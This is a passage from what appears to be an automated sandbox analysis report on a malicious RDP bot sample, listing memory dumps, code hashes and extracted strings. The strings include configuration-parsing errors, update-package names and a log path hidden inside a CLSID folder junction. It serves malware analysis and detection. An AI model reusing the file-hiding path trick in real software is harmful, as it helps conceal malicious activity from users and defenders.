                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: _errno$strtol
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                    • API String ID: 3596500743-1991603811
                                    • Opcode ID: 6e97245f22c7f66e2efc42f922bc7edc8d0a87e4aaaa117f4e926190ba981787
                                    • Instruction ID: 3ad3503f8fba6ed20b469de6c11a5ed060d2c8d430297a0f33a743875d8546b2
                                    • Opcode Fuzzy Hash: 6e97245f22c7f66e2efc42f922bc7edc8d0a87e4aaaa117f4e926190ba981787
                                    • Instruction Fuzzy Hash: BC21B1A9A0868791EB529F21ED857AE7360BB847D4F080071EECC57BA5DF3CD946C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 11288a4003739287dbdb619e60809e9528f7172e8861f30cee537802ce7c250d
                                    • Instruction ID: ef7040a4f585e07e99d0f0ee843cfd47d7e6c423058b3cd191756071a4b9c781
                                    • Opcode Fuzzy Hash: 11288a4003739287dbdb619e60809e9528f7172e8861f30cee537802ce7c250d
                                    • Instruction Fuzzy Hash: 21218CB1A0CA8695F6129F25EC417AA7361AB46B84F44403AFE4C87674CFBCED85C701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 82277fde316036396cc3a27ca53206fad783eaa24996ea684cca2dd4cc975119
                                    • Instruction ID: 60209933889b978dceb563480f24482e712133b6c85443a900c6577d30d85bdf
                                    • Opcode Fuzzy Hash: 82277fde316036396cc3a27ca53206fad783eaa24996ea684cca2dd4cc975119
                                    • Instruction Fuzzy Hash: 13215CA1A0CA8385F3129F25ED407EA3264BB4A784F444032EE4D87674DFBCEC85C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
                                    • Instruction ID: 9ee56d4b920e45d51ea306688e0daa03184a4d19419da0d2fd2daa19e61d8e90
                                    • Opcode Fuzzy Hash: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
                                    • Instruction Fuzzy Hash: 0F21A0A1A08AC285E6128F25FC407AE3366BB56788F4C4272EE4D17768CF3DE945C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 8dc6ef3c3b39a945c0bcc25fab0e5f362bdcd5fceaf0a0628a5bcb49c999219e
                                    • Instruction ID: 7cc0ed81775a87bd8bf5feb89fdf2e9cae9bfcb9bde9f6bd0a2f329b227f0bd4
                                    • Opcode Fuzzy Hash: 8dc6ef3c3b39a945c0bcc25fab0e5f362bdcd5fceaf0a0628a5bcb49c999219e
                                    • Instruction Fuzzy Hash: D121B1A9608A8795E6528F25FC847AE3360FB84784F484072EECD57B64DF3CE945C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 9e9fbaff18e4b396b03782fd795c7ec30d8bc7ac6403233c61c7621373ecb548
                                    • Instruction ID: 3150207f06597a5956c7d2572b9f94646643f28426865bb48cba3ab63b7e55a6
                                    • Opcode Fuzzy Hash: 9e9fbaff18e4b396b03782fd795c7ec30d8bc7ac6403233c61c7621373ecb548
                                    • Instruction Fuzzy Hash: 412168A2A0CA8695F6569F25FC407AA3360BF46784F444132EE4C87764CFBCDE89C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 906b3befdbbb04dcb081f3fc279d4ed90d08040fd0ea7b8ae214153b734c3134
                                    • Instruction ID: eeb607ee3109cb5fdbabfbfb173bf5248128c794575f1ed9e1e93a8253a954b6
                                    • Opcode Fuzzy Hash: 906b3befdbbb04dcb081f3fc279d4ed90d08040fd0ea7b8ae214153b734c3134
                                    • Instruction Fuzzy Hash: 10217CA2618ACB96E7529F25EC407AE3364BB46B88F484072EE4C57A64DF3CD946C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: 78db09826294c9814c6a24a45369037db7cb34c45d54d20db4ea96e6f6016017
                                    • Instruction ID: 619cfd2182145470c652f5b900436514b4ce63a80a1b40c4996e2d34b7c2119a
                                    • Opcode Fuzzy Hash: 78db09826294c9814c6a24a45369037db7cb34c45d54d20db4ea96e6f6016017
                                    • Instruction Fuzzy Hash: 2E4104F1B0C68792FA168B64ED403F97260AB02798F84413AFA5D865B4DFFCAE45C311
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
                                    • Instruction ID: d11845a2c2922702f94e2ab57abae62b704c9d016acf5a3bff74da2074d95b5b
                                    • Opcode Fuzzy Hash: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
                                    • Instruction Fuzzy Hash: 644122E1A086C795FA56CB71EC413FC6351BB26348F4C45B2D94E261A9DF7CE64AC300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: cd5d41a576a556bf55237428aebfa2e7841c9249cb31dc30db104d33d1e7f57a
                                    • Instruction ID: db6438c89e488961b8d872357730d80bcbd55c2715b7cd94eab91dae0d1ab10a
                                    • Opcode Fuzzy Hash: cd5d41a576a556bf55237428aebfa2e7841c9249cb31dc30db104d33d1e7f57a
                                    • Instruction Fuzzy Hash: 9941EAE9A08687A1FA128F71ED993BD6360BB84348F5C41B2E9CD67995DF3CA745C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: f44f3081b609482c8846eb34527f975e3e84389fcc4a7eae18bd3de5c96a3720
                                    • Instruction ID: 4cc74ac77255458ac259a9533ff51c7b00c99c41f3a9f0df7f94186064e718ee
                                    • Opcode Fuzzy Hash: f44f3081b609482c8846eb34527f975e3e84389fcc4a7eae18bd3de5c96a3720
                                    • Instruction Fuzzy Hash: AC41FAE1A0CAC7A5FA1A8F22EC617F46250AF46348F444136DA4D9A1B5DFFCEE59C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    • Opcode ID: 16580016db8d5c9468e6d258d707635842a6bd0b4b298b75ae06a018e2b19fe7
                                    • Instruction ID: 486a832914d55db9acb9aedbaa6ab8337011acbcb5dba3a3fbb4560c8a0263ef
                                    • Opcode Fuzzy Hash: 16580016db8d5c9468e6d258d707635842a6bd0b4b298b75ae06a018e2b19fe7
                                    • Instruction Fuzzy Hash: 974107F1A0C6C791FE129B60EC503B52260BB06358F44413AFA5D961B5DFBCEE45D316
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    • Opcode ID: cc754a487619ba4d3fe55a8fff3b75e044976832e5e2ad57f523f8373a74ed8a
                                    • Instruction ID: 313147f4fc6bd409fe9a8eb7f720878f98023c15b10b5dda290e2a6e08ffdc1a
                                    • Opcode Fuzzy Hash: cc754a487619ba4d3fe55a8fff3b75e044976832e5e2ad57f523f8373a74ed8a
                                    • Instruction Fuzzy Hash: FE412FE1E085C795FA528B70ED457BC6251BB23388F4C45B6D94D265A9DF3CEA8AC300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    • Opcode ID: 179c6dbfefd9be0f64e52d6e20510921a698a95ec800b8d1d30f6f819b4df21c
                                    • Instruction ID: bdc6deac850ddfadbea4bf70543a41f51b3d5431c4fba240119d92920722c3fe
                                    • Opcode Fuzzy Hash: 179c6dbfefd9be0f64e52d6e20510921a698a95ec800b8d1d30f6f819b4df21c
                                    • Instruction Fuzzy Hash: A641FBE9A086C795FA128F61ED997BD6350BF44388F4C40B2DACD67991DF3CAA46C340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    • Opcode ID: 2c776807885660e5bf57067b27f289dba756127a5d7c83c1ed0ce61f4d157fce
                                    • Instruction ID: 711549de5006bce6ad7451c9ab945c8be16e8e3f2ff2939c93032d01bb8beabb
                                    • Opcode Fuzzy Hash: 2c776807885660e5bf57067b27f289dba756127a5d7c83c1ed0ce61f4d157fce
                                    • Instruction Fuzzy Hash: 384125E1A0D6C7A1FA1A8F31EC907B52260AF52348F484036DA5D8A1B1DEECEE4DC300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                    • API String ID: 39653677-1686225151
                                    • Opcode ID: 90beea7e8383602f11ba928d37b552c868a860ea5da908b62ebdf329eea09240
                                    • Instruction ID: 24d4d8d38a09263298cfe3f6192e40555793881f570d41a74a67a7e95d983265
                                    • Opcode Fuzzy Hash: 90beea7e8383602f11ba928d37b552c868a860ea5da908b62ebdf329eea09240
                                    • Instruction Fuzzy Hash: 68212D1290FB43C9FB257A15A81437D9E904F55BD8FC64070DD4D0B7B2DE2CE8568B61
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                    • API String ID: 513531256-2601447032
                                    • Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
                                    • Instruction ID: ec7eba29596c59845d2c630f20f55a405f19ac20937ed7ac9db013b33feba921
                                    • Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
                                    • Instruction Fuzzy Hash: 86415BB2E0C6C186F7329B75ED503B96291BB8A780F400039DA4DD76B6CFADE985C705
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
